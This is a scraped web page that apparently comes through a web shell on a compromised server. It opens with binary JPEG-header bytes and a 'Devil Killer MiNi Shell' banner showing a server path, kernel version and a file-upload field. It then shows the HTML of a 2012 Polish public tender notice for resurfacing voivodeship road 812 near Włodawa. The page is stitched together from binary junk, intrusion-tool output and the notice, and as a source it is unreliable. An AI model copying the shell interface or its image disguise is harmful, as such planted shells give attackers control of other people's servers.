JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120523/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120523/114439-N-2012.html

<p class="kh_header"><b>Włodawa: Regeneracja - pojedyncze powierzchniowe utrwalenie nawierzchni bitumicznej drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice - Włodawa - Chełm
od km 96+900 do km 99+400 (odc. Podpakule - Łowcza)</b><br>
<b>Numer ogłoszenia: 114439 - 2012; data zamieszczenia: 23.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Regeneracja - pojedyncze powierzchniowe utrwalenie nawierzchni bitumicznej drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice - Włodawa - Chełm
od km 96+900 do km 99+400 (odc. Podpakule - Łowcza).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na:

Wykonaniu Regeneracji - pojedynczego powierzchniowego utrwalenie nawierzchni bitumicznej drogi wojewódzkiej Nr 812 Biała Podlaska - Wisznice - Włodawa - Chełm od km 96+900 do km 99+400 (odc. Podpakule - Łowcza)
zgodnie z dokumentacją techniczną, oraz ze szczegółowymi specyfikacjami technicznymi (SST) stanowiącymi załącznik do umowy.
2. Zakres robót obejmuje:
      	
    - odtworzenie trasy drogi w terenie równinnym - 2,5 km,
    - mechaniczne oczyszczenie istniejącej nawierzchni bitumicznej z zanieczyszczeń - 15767,7 m2
    - skropienie nawierzchni drogowej pod w-wę wyrównawczą  - 15767,7 m2 
    - wyrównanie lokalnych nierówności istniejącej nawierzchni bitumicznej betonem  
      asfaltowym dla ruchu KR-2 - 1580,0 Mg
    - wykonanie pojedynczego powierzchniowego utrwalenia nawierzchni
       bitumicznej emulsją kationową modyfikowaną K-70MP/SBR i grysami
       bazaltowymi klasy I frakcji 4-6,3 - 15767,7 m2
3. Szczegółowy zakres robót ujęty jest w dokumentacji technicznej, specyfikacjach technicznych wykonania i odbioru robót oraz przedmiarze stanowiącym załącznik do SIWZ.
4. Okres rękojmi dla robót objętych zamówieniem wynosi 12 miesięcy od daty odbioru  
    ostatecznego.
5. Zgodnie  z art. 30 ust. 4 ustawy, Zamawiający dopuszcza rozwiązania
    równoważne opisywanym.   Wykonawca, który powołuje się na rozwiązania równoważne  
    opisywanym przez  Zamawiającego jest obowiązany wykazać, że oferowane roboty   
    budowlane spełniają  wymagania określone przez Zamawiającego (art. 30, ust.. 5 ustawy)
    Za rozwiązania równoważne uznana będzie oferta na wykonanie regeneracji przy wykorzystaniu technologii, materiałów i sprzętu innego niż określone w Specyfikacji technicznej, pod warunkiem, że ich parametry będą nie gorsze niż określone w ST. 


6. Ponadto Wykonawca zobowiązany jest do: 
    1) zapoznania się w terenie przed złożeniem oferty z miejscem wykonywania robót w celu
        dokonania oceny dokumentów i informacji przekazanych w ramach niniejszego postępowania,
    2) zapewnienia bezpiecznych warunków ruchu drogowego, kołowego i pieszego, 
        w rejonie prowadzonych robót objętych umową, na podstawie sporządzonego
        we własnym zakresie, zgodnie z obowiązującymi przepisami, projektu organizacji 
        ruchu ( na czas prowadzonych robót ) zatwierdzonego przez Zarządzającego
        ruchem na drogach wojewódzkich tj. Dyrektora ZDW w Lublinie.    
Szacunkowa wartość zamówienia netto: 558953,52 PLN.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokości :
    15 000,00 zł. ( piętnaście tysięcy złotych 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo 
    zamówień publicznych.
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy 
    w  Kredyt Banku S.A. O/Lublin Nr 89 1500 1520- 1215 2004 1596 0000.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1. Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63 ust. 3 pkt 1 ustawy Prawo bankowe
z dnia 29 sierpnia 1997 r. ( Dz.U z 2002 r. nr 72 poz. 665 j. t.) polecenie przelewu
jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2. Wadium wnoszone przelewem (art.45 ust. 7 ustawy Pzp) uważa się za wniesione w terminie jeżeli wpłynie na konto Zamawiającego przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunków posiadania wiedzy i doświadczenia 
Wykonawca winien wykonać w ciągu ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie minimum jednej roboty budowlanej odpowiadające rodzajem i zakresem robotom budowlanym będących przedmiotem zamówienia tj. wykonanie pojedynczego powierzchniowego utrwalenia nawierzchni bitumicznej o powierzchni min 10 000 m2,
Ocena spełniania warunku: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania odpowiednim potencjałem 
technicznym niezbędnym do wykonania zamówienia Wykonawca winien dysponować wymienionymi poniżej jednostkami sprzętu i środkami transportu:
          a) Rozkładarka mas bitumicznych - 1 szt. 
          b) Walec ogumiony samojezdny    - 1 szt.
          c) Walec stalowy statyczny             - 1 szt.
          d) Skrapiarka do bitumu samojezdna - 1 szt. 
e) Rozsypywacz grysów - 1 szt.
	f)  Szczotka mechaniczna - 1 szt.
	g) Samochód ciężarowy samowyładowczy - 2 szt.
	h) Ładowarka samojezdna kołowa - 1 szt.
 W przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych 
     do wykonania zamówienia, potencjale technicznym innych podmiotów Zamawiający żąda
     dołączenia do oferty pisemnego zobowiązania tych podmiotów do oddania mu do 
     dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu  
     zamówienia. 
Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania 
    lub kserokopię  zobowiązania poświadczoną, za zgodność z oryginałem przez ten
    podmiot (zgodnie z wyrokami KIO nr KIO 786/11, KIO 787/11, 797/11, KIO 830/11,    KIO 1008/11)
UWAGA!
	1) W przypadku gdy Wykonawca polega na zasobach innych podmiotów jego obowiązkiem jest udowodnienie, że rzeczywiście będzie dysponował wskazanymi zasobami w czasie realizacji zamówienia. W szczególności dotyczy to udostępnienia wiedzy i doświadczenia przez podmiot trzeci. W takim przypadku dla wykazania faktycznego dysponowania odpowiednią wiedzą i doświadczeniem podmiotu trzeciego przy realizacji zamówienia niezbędne może być powołanie się na udział podmiotu trzeciego w wykonywaniu zamówienia. (PRAWO ZAMÓWIEŃ PUBLICZNYCH PO ZMIANACH z 2009 r.  pod redakcją Jacka Sadowskiego)
	2) Zobowiązania podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów winno posiadać formę pisemną, stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci. (Zgodnie z wyrokiem KIO 2213/11)
Ocena spełniania warunku: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku dysponowania osobami zdolnymi do wykonania
          zamówienia Wykonawca winien dysponować minimum jedną osobą, która będzie 
          uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane branży
          drogowej uprawniające do pełnienia funkcji kierownika budowy, 
W przypadku gdy Wykonawca polega na wiedzy i doświadczeniu, osobach zdolnych 
     do wykonania zamówienia, potencjale technicznym innych podmiotów Zamawiający żąda
     dołączenia do oferty pisemnego zobowiązania tych podmiotów do oddania mu do      dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu       zamówienia. 
Przez pisemne zobowiązanie podmiotu trzeciego rozumie się oryginał zobowiązania 
    lub kserokopię  zobowiązania poświadczoną, za zgodność z oryginałem przez ten
    podmiot (zgodnie z wyrokami KIO nr KIO 786/11, KIO 787/11, 797/11, KIO 830/11, KIO 1008/11)
Ocena spełniania warunku: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń lub dokumentów jakie należy dostarczyć w celu potwierdzenia 
    spełniania warunków udziału w postępowaniu, Wykonawca obowiązany jest dołączyć 
    do oferty:
      1) Dowód wniesienia wadium ( w przypadku wniesienia wadium w formie innej niż pieniądz 
          dokument powinien być złożony w formie oryginału).
      2) Formularz ofertowy (z ceną brutto, netto, podatkiem VAT-   wraz z kosztorysem ofertowym)      3) Zaakceptowany wzór umowy  i warunków do umowy       4) W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
      do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
      pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
      albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
      publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
      5) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
      nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument
      potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby podpisujące ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje
    możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty
    polegających:
1)	zmianie wynagrodzenia w przypadku gdy zmianie ulegnie stawka podatku VAT.
3. W razie zaistnienia  istotnej zmiany okoliczności powodującej, że wykonanie umowy nie
    leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy,  Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o powyższych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie ul. Lubelska 60  w pokoju nr 2 w godz. 07:00 -15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.06.2012 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie  22-200 Włodawa, ul. Lubelska 60  w pokoju nr 15 /sekretariat / 
Otwarcie ofert dnia 08.06.2012 r godz. 09:10 pokój Nr 16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W niniejszym postępowaniu oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują: za pomocą faksu nr (82) 572-17-93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl
         Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną , każda ze stron    
na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.

        Osoby uprawnione do porozumiewania się z Wykonawcami.
               1.   W sprawach technicznych - Krystyna Kowalewska   tel. (82) 572 19 52
            2. W sprawach   formalno-prawnych   związanych   z   postępowaniem 
             o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk, 
             Eugeniusz  Kiewczykowski  tel. (82) 572 16 35
Uwaga:
Wykonawcy, którzy uzyskają  niniejszą specyfikację ze strony internetowej zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszenie są o przesłanie krótkiej informacji faxem nr (82) 572-17-93 lub drogą elektroniczną na adres e-mail: rdw.wlodawa@zdw.lublin.pl zawierające podstawowe dane firmy ( nazwa, adres, numer tel. i faksu, adres poczty elektronicznej).Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego indywidualnie (bezpośrednio) zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących specyfikacji istotnych warunków zamówienia, przedłużeniu terminu składania ofert.  
Pouczenie o środkach ochrony prawnej przysługujących wykonawcy 
w toku postępowania o udzielenie zamówienia.

1.  Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
     zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
     czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2.  Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
     (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.

3.  Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
     której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
     zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
     uzasadniające wniesienie odwołania. 
4. Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
     bezpiecznym podpisem elektronicznym weryfiko0wanym za pomocą ważnego 
     kwalifikowanego certyfikatu.
5. Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
    wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesieni, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych 
    w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o o czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenie o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

